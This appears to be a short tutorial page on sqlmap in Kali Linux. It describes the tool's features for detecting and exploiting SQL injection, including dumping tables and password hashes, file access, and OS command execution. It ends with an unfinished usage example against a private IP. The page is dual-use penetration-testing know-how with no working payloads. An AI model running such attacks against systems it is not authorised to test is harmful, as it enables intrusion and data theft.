Sqlmap in Kali Linux
sqlmap Package Description
sqlmap is an open-source penetration tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It includes a robust detection engine, numerous specialist features for the ultimate penetration tester, and a wide range of switches that span database fingerprinting, data retrieval from databases, access to the underlying file system, and executing commands on the operating system via out-of-band connections.
sqlmap is a python based tool; therefore it should operate on any system that supports Python. The purpose of sqlmap is to find and take benefit of SQL injection vulnerabilities in web applications. When it detects one or more SQL injections on the target host, the user can choose from a number of options, including performing an extensive back-end database management system fingerprint, retrieving DBMS session user and database, enumerating users, password hashes, privileges, databases, dumping entire or user-specific DBMS table/columns, running his own SQL statement, reading particular files on the file system and more.
Features of Sqlmap
The following are the features of sqlmap:
- Full support for MYSQL, Oracle, PostgreSQL, Firebird, Sybase, Microsoft Access, IBM DB2, Microsoft SQL Server, SAP MaxDB database management systems.
- Full support for six SQL injection techniques: Boolean-based blind, error-based, stacked queries, UNION query, out-of-band.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based
- Support for database process' user privilege escalation through Metasploit's Meterpreter getsystem
- By giving DBMS credentials, IP address, port, and a database name, it is possible to connect to the database directly without using SQL injection.
- Support for establishing an out-of-band stateful TCP connection between the attacking machine and the database server underlying the operating system. Depending on the user's preference, this channel can be in interactive command prompt, a Meterpreter session, or a graphical user interface (VNC) session.
- When using MYSQL, PostgreSQL, or Microsoft SQL Server, we can download and upload any file from the database server's underlying file system.
- Support for executing arbitrary commands and retrieving their standard output on the operating system's built-in database server when the database software is MYSQL, PostgreSQL or Microsoft SQL server.
- Support for searching across all databases for specific database names, specific tables, or specified columns. This is helpful for identifying tables containing custom applications credentials when the relevant columns' names contain strings such as name and
- Support for dumping whole database tables, a range of entries, or select fields based on the user's preferences. The user can optionally select only a subset of characters from each column's entry to dump.
- Users, password hashes, roles, hashes, databases, tables and columns can be enumerated.
SQLMAP comes pre-installed with Kali Linux, which is usually penetration testers' favorite operating system. We can, however, use the command to install sqlmap on other Debian-based Linux systems.
Tools Included in the sqlmap Package
Sqlmap-automatic SQL injection tool
Sqlmap Usage Example
With the help of the given URL (-u http://192.168.1.250/?p=1&forumaction=search) we can extract the database names (-dbs):